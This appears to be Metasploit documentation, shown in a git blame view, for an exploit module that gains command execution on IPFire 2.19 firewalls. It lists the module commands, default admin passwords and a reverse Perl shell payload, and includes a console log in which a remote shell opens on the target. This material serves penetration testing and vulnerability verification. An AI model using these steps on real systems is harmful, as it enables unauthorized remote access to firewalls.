2017-06-14 21:15:56 -04:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
|
|
|
|
|
|
|
|
|
|
This module has been verified against:
|
|
|
|
|
|
|
|
|
|
1. 2.19 core 100
|
|
|
|
|
2. 2.19 core 110 (exploit-db, not metasploit module)
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install the firewall
|
|
|
|
|
2. Start msfconsole
|
|
|
|
|
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
|
|
|
|
|
4. Do: ```set password admin``` or whatever it was set to at install
|
|
|
|
|
5. Do: ```set rhost 10.10.10.10```
|
|
|
|
|
6. Do: ```set payload cmd/unix/reverse_perl```
|
|
|
|
|
7. Do: ```set lhost 192.168.2.229```
|
|
|
|
|
8. Do: ```exploit```
|
|
|
|
|
9. You should get a shell.
|
|
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
2025-10-15 16:05:53 -04:00
|
|
|
### PASSWORD
|
2017-06-14 21:15:56 -04:00
|
|
|
|
|
|
|
|
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
msf > use exploit/linux/http/ipfire_oinkcode_exec
|
|
|
|
|
msf exploit(ipfire_oinkcode_exec) > set password admin
|
|
|
|
|
password => admin
|
|
|
|
|
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
|
|
|
|
|
rhost => 192.168.2.201
|
|
|
|
|
msf exploit(ipfire_oinkcode_exec) > set verbose true
|
|
|
|
|
verbose => true
|
|
|
|
|
msf exploit(ipfire_oinkcode_exec) > check
|
|
|
|
|
[*] 192.168.2.201:444 The target appears to be vulnerable.
|
|
|
|
|
msf exploit(ipfire_oinkcode_exec) > exploit
|
|
|
|
|
|
|
|
|
|
[*] Started reverse TCP handler on 192.168.2.117:4444
|
|
|
|
|
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
|
|
|
|
|
id
|
|
|
|
|
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
|
|
|
|
|
whoami
|
|
|
|
|
nobody
|
2025-10-15 16:05:53 -04:00
|
|
|
```
|
